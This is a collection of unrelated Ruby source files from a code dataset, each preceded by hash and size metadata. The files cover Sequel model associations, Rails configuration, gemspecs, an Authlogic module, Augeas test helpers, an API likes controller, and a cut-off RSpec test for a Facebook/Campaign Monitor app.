e23a9dffa758f2a3f9272a7cdfe4f277d1ab2561 | 4,830 | module Sequel
class Model
ID_POSTFIX = '_id'.freeze
# Creates a 1-1 relationship by defining an association method, e.g.:
#
# class Session < Sequel::Model
# end
#
# class Node < Sequel::Model
# one_to_one :producer, :from => Session
# # which is equivalent to
# def producer
# Session[producer_id] if producer_id
# end
# end
#
# You can also set the foreign key explicitly by including a :key option:
#
# one_to_one :producer, :from => Session, :key => :producer_id
#
# The one_to_one macro also creates a setter, which accepts nil, a hash or
# a model instance, e.g.:
#
# p = Producer[1234]
# node = Node[:path => '/']
# node.producer = p
# node.producer_id #=> 1234
#
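    # As a purely illustrative sketch (reusing the hypothetical Node/Producer
    # names from above), a hash or nil can be assigned as well:
    #
    #   node.producer = {:id => 1234}   # stores 1234 in producer_id
    #   node.producer = nil             # clears producer_id
    #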
def self.one_to_one(name, opts)
from = opts[:from]
from || (raise Error, "No association source defined (use :from option)")
key = opts[:key] || (name.to_s + ID_POSTFIX).to_sym
setter_name = "#{name}=".to_sym
case from
when Symbol
class_def(name) {(k = @values[key]) ? db[from][:id => k] : nil}
when Sequel::Dataset
class_def(name) {(k = @values[key]) ? from[:id => k] : nil}
else
class_def(name) {(k = @values[key]) ? from[k] : nil}
end
class_def(setter_name) do |v|
case v
when nil
set(key => nil)
when Sequel::Model
set(key => v.pk)
when Hash
set(key => v[:id])
end
end
# define_method name, &eval(ONE_TO_ONE_PROC % [key, from])
end
# Creates a 1-N relationship by defining an association method, e.g.:
#
# class Book < Sequel::Model
# end
#
# class Author < Sequel::Model
# one_to_many :books, :from => Book
# # which is equivalent to
# def books
# Book.filter(:author_id => id)
# end
# end
#
# You can also set the foreign key explicitly by including a :key option:
#
# one_to_many :books, :from => Book, :key => :author_id
#
def self.one_to_many(name, opts)
from = opts[:from]
from || (raise Error, "No association source defined (use :from option)")
key = opts[:key] || (self.to_s + ID_POSTFIX).to_sym
case from
when Symbol
class_def(name) {db[from].filter(key => pk)}
else
class_def(name) {from.filter(key => pk)}
end
end
# TODO: Add/Replace current relations with the following specifications:
# ======================================================================
# Database modelling is generally done with an ER (Entity Relationship) diagram.
    # Shouldn't ORMs facilitate similar specification?
# class Post < Sequel::Model
# relationships do
# # Specify the relationships that exist with the User model (users table)
# # These relationships are precisely the ER diagram connecting arrows.
# end
# end
#
# = Relationships
#
    # are specifications of the ends of the ER diagram's connectors that touch
    # the current model.
#
# one_to_one, has_one
# many_to_one, belongs_to
# many_to_many, has_many
# ?parameters may be :zero, :one, :many which specifies the cardinality of the connection
# Example:
# class Post < Sequel::Model
# relationships do
# has :one, :blog, :required => true # blog_id field, cannot be null
# has :one, :account # account_id field
# has :many, :comments # comments_posts join table
# has :many, :authors, :required => true # authors_posts join table, requires at least one author
# end
# end
#
# Relationship API Details
#
#
# == belongs_to
#
# Defines an blog and blog= method
# belongs_to :blog
# Same, but uses "b_id" as the blog's id field.
# belongs_to :blog, :key => :b_id
# has_many :comments
# * Defines comments method which will query the join table appropriately.
# * Checks to see if a "comments_posts" join table exists (alphabetical order)
# ** If it does not exist, will create the join table.
# ** If options are passed in these will be used to further define the join table.
# Benefits:
# * Normalized DB
# * Easy to define join objects
# * Efficient queries, database gets to use indexed fields (pkeys) instead of a string field and an id.
#
# For example, polymorphic associations now become:
# [user] 1-* [addresses_users] *-1 [addresses]
# [companies] 1-* [addresses_companies] *-1 [addresses]
# [clients] 1-* [addresses_clients] *-1 [addresses]
end
end | 31.363636 | 108 | 0.57619 |
e85004d8e348f4eb29e5310e4a4deb2cfa1bd39d | 5,111 | require "active_support/core_ext/integer/time"
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Include generic and useful information about system operation, but avoid logging too much
# information to avoid inadvertent exposure of personally identifiable information (PII).
config.log_level = :info
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "supertape_backend_api_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Log disallowed deprecations.
config.active_support.disallowed_deprecation = :log
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require "syslog/logger"
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 44.833333 | 114 | 0.765995 |
4a26e1df055a0ba629132e4e0661185a97325824 | 745 |
# Ensure this FILE NAME is the name you want for your library
# This is the primary criteria by which your library will be
# found by users of rubygems and sprouts
name = File.basename(__FILE__).split('.').shift
gem_wrap name do |t|
t.version = '2.0.4'
t.summary = "PureMVC is a lightweight framework for creating applications in ActionScript 3, based upon the classic Model-View-Controller design meta-pattern."
t.author = 'Cliff Hall'
t.email = '[email protected]'
t.homepage = 'http://www.puremvc.org'
t.sprout_spec =<<EOF
- !ruby/object:Sprout::RemoteFileTarget
platform: universal
url: http://puremvc.org/pages/downloads/AS3/PureMVC_AS3.zip
archive_path: PureMVC_AS3_2_0_4/src
EOF
end
| 37.25 | 167 | 0.714094 |
f70a8d052a3a7705a81930badf1578c482cc661f | 862 | module Authlogic
module Session
# = ActiveRecord Trickery
#
    # Authlogic looks like ActiveRecord, sounds like ActiveRecord, but it's not ActiveRecord. That's the goal here. This is useful for the various Rails helper methods such as form_for, error_messages_for, or any
# method that expects an ActiveRecord object. The point is to disguise the object as an ActiveRecord object so we have no problems.
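    #
    # A rough usage sketch (hypothetical application code, not part of this
    # module): because a session object answers new_record? and
    # human_attribute_name, it can be handed straight to helpers such as
    # form_for:
    #
    #   form_for @user_session, :url => user_session_path do |f|
    #     ...
    #   end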
module ActiveRecordTrickery
def self.included(klass) # :nodoc:
klass.extend ClassMethods
klass.send(:include, InstanceMethods)
end
module ClassMethods # :nodoc:
def human_attribute_name(*args)
klass.human_attribute_name(*args)
end
end
module InstanceMethods # :nodoc:
def new_record?
new_session?
end
end
end
end
end | 33.153846 | 211 | 0.674014 |
7ab63e1ba1c5701d23944b11c43cd22de1521209 | 2,458 | require 'augeas'
require 'tempfile'
module AugeasSpec::Fixtures
# Creates a temp file from a given fixture name
# Doesn't explicitly clean up the temp file as we can't evaluate a block with
# "let" or pass the path back via an "around" hook.
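  # For example (the fixture name below is hypothetical):
  #
  #   let(:tmptarget) { aug_fixture("full") }
  #   # tmptarget.path can then be handed to the provider under test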
def aug_fixture(name)
tmp = Tempfile.new("target")
tmp.write(File.read(my_fixture(name)))
tmp.close
return tmp
end
# Runs a particular resource via a catalog
def apply(*resources)
catalog = Puppet::Resource::Catalog.new
resources.each do |resource|
catalog.add_resource resource
end
catalog.apply
end
# Runs a resource and checks for warnings and errors
def apply!(*resources)
txn = apply(*resources)
# Check for warning+ log messages
loglevels = Puppet::Util::Log.levels[3, 999]
firstlogs = @logs.dup
@logs.select { |log| loglevels.include? log.level }.should == []
# Check for transaction success after, as it's less informative
txn.any_failed?.should_not be_true
# Run the exact same resources, but this time ensure there were absolutely
# no changes (as seen by logs) to indicate if it was idempotent or not
@logs.clear
txn_idempotent = apply(*resources)
loglevels = Puppet::Util::Log.levels[2, 999]
againlogs = @logs.select { |log| loglevels.include? log.level }
againlogs.should eq([]), "expected no change on second run (idempotence check),\n got: #{againlogs.inspect}"
txn_idempotent.any_failed?.should_not be_true, "expected no change on second run (idempotence check), got a resource failure"
@logs = firstlogs
txn
end
# Open Augeas on a given file. Used for testing the results of running
# Puppet providers.
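  #
  # A minimal usage sketch (the lens, file, and path below are hypothetical,
  # for illustration only):
  #
  #   aug_open("/etc/hosts", "Hosts.lns") do |aug|
  #     aug.get("1/ipaddr").should == "127.0.0.1"
  #   end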
def aug_open(file, lens, &block)
aug = Augeas.open(nil, nil, Augeas::NO_MODL_AUTOLOAD)
begin
aug.transform(
:lens => lens,
:name => lens.split(".")[0],
:incl => file,
:excl => []
)
aug.set("/augeas/context", "/files#{file}")
aug.load!
raise AugeasSpec::Error, "Augeas didn't load #{file}" if aug.match(".").empty?
yield aug
rescue Augeas::Error
errors = []
aug.match("/augeas//error").each do |errnode|
aug.match("#{errnode}/*").each do |subnode|
subvalue = aug.get(subnode)
errors << "#{subnode} = #{subvalue}"
end
end
raise AugeasSpec::Error, errors.join("\n")
ensure
aug.close
end
end
end
| 31.113924 | 129 | 0.648495 |
11240e6b7501aed39ef508cc8c79c151628aefc2 | 218 | Rails.application.routes.draw do
resources :pins
devise_for :users
root 'home#index'
get 'home/about'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 21.8 | 101 | 0.747706 |
031de8af83c91cfa82741f189f78344e0d53f7d3 | 4,128 | ## This is the rakegem gemspec template. Make sure you read and understand
## all of the comments. Some sections require modification, and others can
## be deleted if you don't need them. Once you understand the contents of
## this file, feel free to delete any comments that begin with two hash marks.
## You can find comprehensive Gem::Specification documentation, at
## http://docs.rubygems.org/read/chapter/20
Gem::Specification.new do |s|
s.specification_version = 2 if s.respond_to? :specification_version=
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.rubygems_version = '1.3.5'
  ## Leave these as-is; they will be modified for you by the rake gemspec task.
## If your rubyforge_project name is different, then edit it and comment out
## the sub! line in the Rakefile
s.name = 'metriks'
s.version = '0.9.9.8'
s.date = '2017-04-26'
## Make sure your summary is short. The description may be as long
## as you like.
s.summary = "An experimental metrics client"
s.description = "An experimental metrics client."
## List the primary authors. If there are a bunch of authors, it's probably
## better to set the email to an email list or something. If you don't have
## a custom homepage, consider using your GitHub URL or the like.
s.authors = ["Eric Lindvall"]
s.email = '[email protected]'
s.homepage = 'https://github.com/eric/metriks'
## This gets added to the $LOAD_PATH so that 'lib/NAME.rb' can be required as
  ## require 'NAME.rb', or 'lib/NAME/file.rb' can be required as require 'NAME/file.rb'
s.require_paths = %w[lib]
## Specify any RDoc options here. You'll want to add your README and
## LICENSE files to the extra_rdoc_files list.
s.rdoc_options = ["--charset=UTF-8"]
s.extra_rdoc_files = %w[README.md LICENSE]
## List your runtime dependencies here. Runtime dependencies are those
## that are needed for an end user to actually USE your code.
s.add_dependency('atomic', ["~> 1.0"])
s.add_dependency('hitimes', [ "~> 1.1"])
s.add_dependency('avl_tree', [ "~> 1.2.0" ])
s.add_dependency('HDRHistogram', [ "0.1.9" ])
## List your development dependencies here. Development dependencies are
## those that are only needed during development
# s.add_development_dependency('tomdoc', ["~> 0.2"])
s.add_development_dependency('mocha', ['~> 1.7'])
## Leave this section as-is. It will be automatically generated from the
## contents of your Git repository via the gemspec task. DO NOT REMOVE
## THE MANIFEST COMMENTS, they are used as delimiters by the task.
# = MANIFEST =
s.files = %w[
Gemfile
LICENSE
README.md
Rakefile
benchmark/samplers.rb
lib/metriks.rb
lib/metriks/counter.rb
lib/metriks/ewma.rb
lib/metriks/exponentially_decaying_sample.rb
lib/metriks/gauge.rb
lib/metriks/hdr_histogram.rb
lib/metriks/hdr_histogram_snapshot.rb
lib/metriks/histogram.rb
lib/metriks/meter.rb
lib/metriks/registry.rb
lib/metriks/reporter/graphite.rb
lib/metriks/reporter/librato_metrics.rb
lib/metriks/reporter/logger.rb
lib/metriks/reporter/proc_title.rb
lib/metriks/reporter/riemann.rb
lib/metriks/simple_moving_average.rb
lib/metriks/snapshot.rb
lib/metriks/time_tracker.rb
lib/metriks/timer.rb
lib/metriks/uniform_sample.rb
lib/metriks/utilization_timer.rb
metriks.gemspec
test/counter_test.rb
test/gauge_test.rb
test/graphite_reporter_test.rb
test/histogram_test.rb
test/librato_metrics_reporter_test.rb
test/logger_reporter_test.rb
test/meter_test.rb
test/metriks_test.rb
test/proc_title_reporter_test.rb
test/registry_test.rb
test/riemann_reporter_test.rb
test/test_helper.rb
test/thread_error_handling_tests.rb
test/timer_test.rb
test/utilization_timer_test.rb
]
# = MANIFEST =
## Test files will be grabbed from the file list. Make sure the path glob
## matches what you actually use.
s.test_files = s.files.select { |path| path =~ /^test\/.*_test\.rb/ }
end
| 38.943396 | 105 | 0.712694 |
1a5546236c2d1c7545debf001a207a5381f06233 | 170 | require File.expand_path('../../../../../../spec_helper', __FILE__)
describe "OpenSSL::PKey::EC::Point#invert!" do
it "needs to be reviewed for spec completeness"
end
| 28.333333 | 67 | 0.682353 |
bbd78aacf7a1fa1b36bd492684bb70312af7ec5d | 1,103 | class Fonttools < Formula
include Language::Python::Virtualenv
desc "Library for manipulating fonts"
homepage "https://github.com/fonttools/fonttools"
url "https://github.com/fonttools/fonttools/releases/download/4.13.0/fonttools-4.13.0.zip"
sha256 "63987cd374c39a75146748f8be8637634221e53fef15cdf76f17777676d8545a"
head "https://github.com/fonttools/fonttools.git"
bottle do
cellar :any_skip_relocation
sha256 "ca4cebdcc20adb4a2baf2d046bf473442ccfdb0e5b0fcaf29d3d59e41191a402" => :catalina
sha256 "b6a07cdc0477ecd7b33280284cebb828561545b7eb2596cb02043c34eb5ca2e2" => :mojave
sha256 "ad3109af81809ff975094d7cff4ef352b4661e20f3a419e3ff9e97997c31fcf2" => :high_sierra
sha256 "d7da6264fafb205c143adfbf07ebe709ee98a16b21dff6b591a6efb2e21877fe" => :x86_64_linux
end
depends_on "[email protected]"
def install
virtualenv_install_with_resources
end
test do
unless OS.mac?
assert_match "usage", shell_output("#{bin}/ttx -h")
return
end
cp "/System/Library/Fonts/ZapfDingbats.ttf", testpath
system bin/"ttx", "ZapfDingbats.ttf"
end
end
| 33.424242 | 94 | 0.777879 |
339ba82e49eb28b2b59725c6d02eaa58afda6949 | 1,790 | class Helmfile < Formula
desc "Deploy Kubernetes Helm Charts"
homepage "https://github.com/roboll/helmfile"
url "https://github.com/roboll/helmfile/archive/v0.111.0.tar.gz"
sha256 "91263ca1b058475f78a30da2965a74c03def503d1d1db350544bd486d954a4c4"
bottle do
cellar :any_skip_relocation
sha256 "da6898c0278a289578a3864d03015ed32163d2a149251f1701dd5a848aa67290" => :catalina
sha256 "aefd1a740181dcdfd17b232405d5920da2bada24f69b49fee3e3179ca1c3df31" => :mojave
sha256 "4e67e2a8c375c4f494ba87ae7d8449ea93ba1daa19f0cc4e26e35b1a4e215162" => :high_sierra
end
depends_on "go" => :build
depends_on "helm"
def install
system "go", "build", "-ldflags", "-X github.com/roboll/helmfile/pkg/app/version.Version=v#{version}",
"-o", bin/"helmfile", "-v", "github.com/roboll/helmfile"
end
test do
(testpath/"helmfile.yaml").write <<-EOS
repositories:
- name: stable
url: https://kubernetes-charts.storage.googleapis.com/
releases:
- name: vault # name of this release
namespace: vault # target namespace
labels: # Arbitrary key value pairs for filtering releases
foo: bar
chart: roboll/vault-secret-manager # the chart being installed to create this release, referenced by `repository/chart` syntax
version: ~1.24.1 # the semver of the chart. range constraint is supported
EOS
system Formula["helm"].opt_bin/"helm", "create", "foo"
output = "Adding repo stable https://kubernetes-charts.storage.googleapis.com"
assert_match output, shell_output("#{bin}/helmfile -f helmfile.yaml repos 2>&1")
assert_match version.to_s, shell_output("#{bin}/helmfile -v")
end
end
| 42.619048 | 136 | 0.682123 |
bfbc11952d475a2b64115269095b1d532f6d714c | 585 | module Api
module V1
class AuthenticationController < ApplicationController
def create
user = User.find_by(email: login_params[:email].downcase)
if user.present? && user.authenticate(login_params[:password])
user.update(token: SecureRandom.hex)
render json: UserSerializer.serialize(user), status: 201
else
render json: { errors: "Invalid Credentials" }, status: 404
end
end
private
def login_params
params.require(:credentials).permit(:email, :password)
end
end
end
end
| 26.590909 | 70 | 0.642735 |
6a71f421eab5c1bd04e076693bbc917b239b7c7b | 1,121 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module TextrisExample
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.518519 | 99 | 0.735058 |
f7d40264e45ca6f344977b9702e9db60c1b23a92 | 7,297 | =begin
#Gomematic OpenAPI
#API definition for Gomematic
The version of the OpenAPI document: 1.0.0-alpha1
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0
=end
require 'date'
module Gomematic
class UserTeamParams
attr_accessor :team
attr_accessor :perm
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'team' => :'team',
:'perm' => :'perm'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'team' => :'String',
:'perm' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Gomematic::UserTeamParams` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Gomematic::UserTeamParams`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'team')
self.team = attributes[:'team']
end
if attributes.key?(:'perm')
self.perm = attributes[:'perm']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @team.nil?
invalid_properties.push('invalid value for "team", team cannot be nil.')
end
if @perm.nil?
invalid_properties.push('invalid value for "perm", perm cannot be nil.')
end
invalid_properties
end
    # Check to see if all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @team.nil?
return false if @perm.nil?
perm_validator = EnumAttributeValidator.new('String', ["user", "admin", "owner"])
return false unless perm_validator.valid?(@perm)
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] perm Object to be assigned
def perm=(perm)
validator = EnumAttributeValidator.new('String', ["user", "admin", "owner"])
unless validator.valid?(perm)
fail ArgumentError, "invalid value for \"perm\", must be one of #{validator.allowable_values}."
end
@perm = perm
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
team == o.team &&
perm == o.perm
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[team, perm].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
Gomematic.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.188 | 203 | 0.615458 |
39f448fff3956b407616a286c65938b0cc7b1daa | 10 | #My Code!
| 5 | 9 | 0.6 |
4ae98e588f951f5b5f2238bc73fff3a6b70ea215 | 38 | module Refill
VERSION = '0.0.0'
end
| 9.5 | 19 | 0.657895 |
f8b1daf5f0e1013ca014f21250733f8889017ed7 | 1,320 | # frozen_string_literal: true
module Api
module V3
class LikesController < Api::V3::ApplicationController
before_action :doorkeeper_authorize!
before_action do
requires! :obj_type, values: %w[topic reply]
requires! :obj_id
end
      # Like an item
      #
      # POST /api/v3/likes
      #
      # @param obj_type [String] type of the object being liked [topic, reply]
      # @param obj_id [Integer] ID of the corresponding record
      #
      # == returns
      # - count [Integer] number of likes so far
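      #
      # An illustrative response body (values are examples only):
      #   { "obj_type": "topic", "obj_id": 42, "count": 3 }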
def create
current_user.like(likeable)
likeable.reload
data = { obj_type: params[:obj_type], obj_id: likeable.id, count: likeable.likes_count }
render json: data
end
      # Remove a previous like
#
# DELETE /api/v3/likes
#
# @param (see #create)
# @return (see #create)
def destroy
current_user.unlike(likeable)
likeable.reload
data = { obj_type: params[:obj_type], obj_id: likeable.id, count: likeable.likes_count }
render json: data
end
private
def likeable
return @likeable if defined? @likeable
@likeable =
if params[:obj_type] == "topic"
Topic.find(params[:obj_id])
else
Reply.find(params[:obj_id])
end
end
end
end
end
| 23.571429 | 96 | 0.559848 |
e83856b5efe2f1ddf96b648a880a85dc3bb3dfa8 | 27,363 | require "helper"
set :environment, :test
OmniAuth.config.test_mode = true
describe "The Campaign Monitor Subscribe Form app" do
let(:app) { Sinatra::Application }
let(:user_id) { "7654321" }
let(:fb_token) { "xxxx" }
let(:cm_api_key) { "testapikey" }
before do
DataMapper.auto_migrate!
end
describe "GET /auth/facebook/callback?code=xyz" do
let(:auth_hash) {
{
"provider" => "facebook",
"uid" => user_id,
"info" => {},
"credentials" => {
"token" => fb_token,
"expires_at" => "1321747205",
"expires" => "true"
},
"extra" => {}
}
}
before do
OmniAuth.config.mock_auth[:facebook] = OmniAuth::AuthHash.new(auth_hash)
end
it "stores the correct session values and redirects" do
get "/auth/facebook/callback"
expect(last_request.env["rack.session"]["fb_auth"]["uid"]).to eq(user_id)
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /" do
context "when there's no session for the user" do
it "redirects to request authorisation" do
get "/"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/auth/facebook")
end
end
context "when there's a session for the user but it doesn't match the current fb user" do
it "clears the session and redirects to request authorisation" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => "1234567" } } }
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/auth/facebook")
end
end
context "when the user is successfully authenticated but doesn't have a saved account" do
before do
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => "")
end
it "loads the main page, requesting that the user sign into Campaign Monitor" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
expect(last_request.env["rack.session"]["fb_auth"]).to eq({ "uid" => user_id })
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(200)
expect(last_response.body).to include("Log into your account")
end
end
context "when the user is successfully authenticated and has a saved account" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
pages_response = <<-PAGES_RESPONSE
{
"data": [
{
"access_token": "testpageaccesstoken",
"category": "Internet/software",
"name": "#{page_name}",
"id": "#{page_id}",
"perms": [ "ADMINISTER", "EDIT_PROFILE", "CREATE_CONTENT",
"MODERATE_CONTENT", "CREATE_ADS", "BASIC_ADMIN"
]
}
],
"paging": {
"cursors": { "before": "before", "after": "after" }
}
}
PAGES_RESPONSE
stub_request(:get, "https://graph.facebook.com/v2.2/#{user_id}/accounts?access_token=#{fb_token}").
to_return(:status => 200, :body => pages_response)
page_fields_response = <<-FIELDS_RESPONSE
{
"picture": {
"data": {
"is_silhouette": false,
"url": "https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xfa1/v/t1.0-1/c13.0.50.50/p50x50/blah_n.jpg?oh=blah&oe=5578EF5D&__gda__=blah"
}
},
"id": "#{page_id}"
}
FIELDS_RESPONSE
stub_request(:get, "https://graph.facebook.com/v2.2/#{page_id}?access_token=#{fb_token}&fields=picture").
to_return(:status => 200, :body => page_fields_response)
end
it "loads the main page with the user's saved details" do
get "/",
{ "facebook" => { "user_id" => user_id } },
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
expect(last_request.env["rack.session"]["fb_auth"]).to eq({ "uid" => user_id })
expect(last_request.env["rack.session"]["fb_token"]).to eq (fb_token)
expect(last_response.status).to eq(200)
expect(last_response.body).to include(page_name)
end
end
end
describe "GET /saved/:page_id" do
